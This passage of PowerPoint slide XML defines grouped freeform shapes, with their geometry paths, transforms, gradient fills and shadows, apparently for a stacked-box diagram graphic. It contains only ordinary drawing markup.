                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA873A9-63E7-4981-9204-2D59C5FEDF8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83" name="Freeform 2017">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F54087-0B29-4554-B3F0-677434E9F2B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429" name="Group 2018">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50FB3500-EB52-4D25-9B7E-517B25075CE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58" y="2159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478" name="Freeform 2019">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8093659-0F44-4B3E-80B8-1AE0EB7A595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79" name="Freeform 2020">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E6DC8A-67AE-4330-A30D-560740CA2C4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80" name="Freeform 2021">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D397EBE0-7A2B-4023-BC0F-6AEF464C2C6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430" name="Group 2022">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDA3F93-8EFB-458E-839D-5B77D742F22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972" y="2327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475" name="Freeform 2023">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D508D94-9614-444F-98FE-18DC9BD7B1E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76" name="Freeform 2024">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C280CF43-90F1-49A7-9AA7-D2C2D9294AA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77" name="Freeform 2025">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECCFC300-E0D2-466E-A96D-AE80489CA01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431" name="Group 2026">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B90D8251-C840-4D8E-A8DD-3D2080C7C04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41" y="2669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472" name="Freeform 2027">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2333963-2A50-4089-BE72-42FA91DA325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73" name="Freeform 2028">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C10557-9848-484B-9A04-13F2197843B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74" name="Freeform 2029">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693DD2C6-6C6D-4214-A95F-1AC6F5A60C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432" name="Group 2030">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCAFD7DD-397C-4124-B85B-BE0BD8CBC35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24" y="2502"/>
                    <a:ext cx="138" cy="173"/>
                    <a:chOff x="2343" y="728"/>
                    <a:chExt cx="569" cy="718"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2469" name="Freeform 2031">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7245C13E-85AC-4377-B269-992F940050B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70" name="Freeform 2032">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC2207B-04EA-46F5-8624-27F2E9EA0C6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71" name="Freeform 2033">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF3ADD7A-2EF4-4598-B197-54B51678D50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433" name="Group 2034">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359BBB46-D4D3-4440-8C6B-36EF1DBD54A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58" y="2390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466" name="Freeform 2035">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A73750-0511-4101-A0F9-40548BA040E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67" name="Freeform 2036">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC8F07EE-09DE-4C66-8894-513CC2FE7D2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68" name="Freeform 2037">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30BD3C6-1584-40B5-9781-3E083EEC744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434" name="Group 2038">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4270AA39-F663-4448-BE5F-C57BE4DF66D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972" y="1877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463" name="Freeform 2039">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B59AC2-6F61-4B28-A45B-1DF120302B9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64" name="Freeform 2040">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9EBF7F-9013-4FBC-9BEB-EC01A13D1A3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65" name="Freeform 2041">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8844971-3895-4522-9326-903F4D44048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435" name="Group 2042">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8EE7726-E5CB-46D5-9A3B-9C5531DC1D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19" y="2281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460" name="Freeform 2043">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC8B9A0-1331-4A35-A772-2D31EB22AAD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61" name="Freeform 2044">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272CF5F8-1851-4504-976B-FA76B345383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62" name="Freeform 2045">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2999BA07-C076-4B5E-8B25-45826B3FFC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436" name="Group 2046">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E513FA1D-75A2-4AB1-A521-3EFEFBC1525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42" y="1998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457" name="Freeform 2047">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75CDD64-DBC0-4DF6-8C4D-06266242852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58" name="Freeform 2048">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E010999-3481-4E6F-A582-47DB7F7CA2B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59" name="Freeform 2049">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC910A17-3A9C-4066-A81A-6D1EFAF9F72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437" name="Group 2050">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EA02BC-E222-4F5F-883C-7C26F179C0F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58" y="1936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454" name="Freeform 2051">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C4E240-4920-48F6-8C74-D4662126238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55" name="Freeform 2052">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E5AC2F-CB32-4C77-9CAC-979382A74D4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56" name="Freeform 2053">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEA61B8-333F-492D-A841-C0A46277576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438" name="Group 2054">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEF51C0-1317-41C2-B5B8-0BE94CAB519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24" y="2055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451" name="Freeform 2055">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D738885-610A-4798-8EEE-955ED09071A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52" name="Freeform 2056">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F90CB3-413A-41C5-A012-CE8D59EFF33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53" name="Freeform 2057">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20B1EE8-C806-4EEF-B3B9-9E5C7A674F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439" name="Group 2058">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09C3A865-ABA8-49A2-949D-F9CED9DD3F5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191" y="2271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448" name="Freeform 2059">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF58AD47-3841-4A93-9AC2-1A57FAD1B7C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49" name="Freeform 2060">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D736DF-F313-4FC9-A1AB-2B05486DB51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50" name="Freeform 2061">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75447D23-B2B8-469B-98CE-F4E127DEAA5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440" name="Group 2062">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB2DBC5-0885-4418-AF0A-1EFC83BC472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973" y="2554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445" name="Freeform 2063">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CAC5A3A-772E-4764-ACBD-82C353691ED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46" name="Freeform 2064">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AFF109-4E8F-4CA4-9786-F005DF84868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47" name="Freeform 2065">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614F6066-779C-4A26-AB9D-4648D3F76B3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441" name="Group 2066">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD27544D-2936-45FC-8758-AFD80A60683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191" y="2499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442" name="Freeform 2067">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32AE328D-2539-46EE-8DF2-40C1B68EC17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43" name="Freeform 2068">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8BA15B9-9522-4961-BE7D-5D12859875B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44" name="Freeform 2069">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C973533-709C-4E71-B41D-BCB367E935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sp>
          <p:nvSpPr>
            <p:cNvPr id="2072" name="Freeform 2082">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8902BEB1-35A2-4D50-8D58-35767A661B6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6995342" y="2339975"/>
              <a:ext cx="2044700" cy="549275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chemeClr val="bg1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073" name="Group 2301">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A04A354-1E37-4864-A9C9-1DB43F0123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4230" y="1765300"/>
              <a:ext cx="2044700" cy="1130300"/>
              <a:chOff x="239" y="2238"/>
              <a:chExt cx="1288" cy="712"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2311" name="Group 2296">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB0B674-C890-4FA8-8DF4-D2B46D912B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9" y="2238"/>
                <a:ext cx="1288" cy="712"/>
                <a:chOff x="239" y="2238"/>
                <a:chExt cx="1288" cy="712"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2332" name="Freeform 2105">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B48C107-AC0D-4806-A5DF-A680BF55EFB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39" y="2605"/>
                  <a:ext cx="1288" cy="345"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 161"/>
                    <a:gd name="T1" fmla="*/ 22 h 44"/>
                    <a:gd name="T2" fmla="*/ 81 w 161"/>
                    <a:gd name="T3" fmla="*/ 0 h 44"/>
                    <a:gd name="T4" fmla="*/ 161 w 161"/>
                    <a:gd name="T5" fmla="*/ 22 h 44"/>
                    <a:gd name="T6" fmla="*/ 81 w 161"/>
                    <a:gd name="T7" fmla="*/ 44 h 44"/>
                    <a:gd name="T8" fmla="*/ 0 w 161"/>
                    <a:gd name="T9" fmla="*/ 22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1" h="44">
                      <a:moveTo>
                        <a:pt x="0" y="22"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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B2B2B2">
                        <a:gamma/>
                        <a:tint val="68627"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="B2B2B2"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:ln w="190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>
                  <a:outerShdw dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="808080"/>
                  </a:outerShdw>
                </a:effec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2333" name="Group 2106">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE138CA1-D2D8-4225-AB9B-7670515D05F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16" y="2238"/>
                  <a:ext cx="857" cy="639"/>
                  <a:chOff x="1938" y="1958"/>
                  <a:chExt cx="1730" cy="1292"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2334" name="Group 2107">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A5E6D98-2E00-48ED-8F51-FBD8F245089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485" y="2283"/>
                    <a:ext cx="322" cy="529"/>
                    <a:chOff x="3183" y="1180"/>
                    <a:chExt cx="322" cy="529"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2414" name="Freeform 2108">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE0B2E1-B391-4A49-87FD-175F218F9FE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183" y="1180"/>
                      <a:ext cx="107" cy="472"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 999"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 61 h 999"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 999 h 999"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 937 h 999"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 99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27" h="999">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="61"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="999"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="937"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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15" name="Freeform 2109">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED59DEB2-4296-43E7-9111-52053BDD7D6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183" y="1595"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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16" name="Freeform 2110">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05606346-298F-4A2E-8B4F-5F1B3F666E6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183" y="1180"/>
                      <a:ext cx="322" cy="87"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 184"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 184"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 122 h 184"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 184 h 184"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 18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0" h="184">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="122"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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17" name="Freeform 2111">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E7DD5D-CA5D-4C9A-968C-3C6B465692F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183" y="1402"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 120 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59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18" name="Freeform 2112">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD25D648-FDA4-4686-A6A5-F39DC6416BD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371" y="1259"/>
                      <a:ext cx="27" cy="450"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 56"/>
                        <a:gd name="T1" fmla="*/ 938 h 952"/>
                        <a:gd name="T2" fmla="*/ 0 w 56"/>
                        <a:gd name="T3" fmla="*/ 0 h 952"/>
                        <a:gd name="T4" fmla="*/ 56 w 56"/>
                        <a:gd name="T5" fmla="*/ 17 h 952"/>
                        <a:gd name="T6" fmla="*/ 56 w 56"/>
                        <a:gd name="T7" fmla="*/ 952 h 952"/>
                        <a:gd name="T8" fmla="*/ 0 w 56"/>
                        <a:gd name="T9" fmla="*/ 938 h 95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6" h="952">
                          <a:moveTo>
                            <a:pt x="0" y="938"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="17"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="952"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="938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19" name="Freeform 2113">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8C25D85-BD94-4F1B-892D-996FC6E7A1C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183" y="1209"/>
                      <a:ext cx="27" cy="450"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 938 h 952"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 0 h 952"/>
                        <a:gd name="T4" fmla="*/ 57 w 57"/>
                        <a:gd name="T5" fmla="*/ 17 h 952"/>
                        <a:gd name="T6" fmla="*/ 57 w 57"/>
                        <a:gd name="T7" fmla="*/ 952 h 952"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 938 h 95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952">
                          <a:moveTo>
                            <a:pt x="0" y="938"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="17"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="952"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="938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20" name="Freeform 2114">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F8F733-3E9D-41A5-94B7-99A78BEE413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210" y="1438"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 90 h 149"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 2 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2" y="5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21" name="Freeform 2115">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483B6C9E-59FC-4D72-9A7B-34FE71CB4F3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210" y="1217"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 148"/>
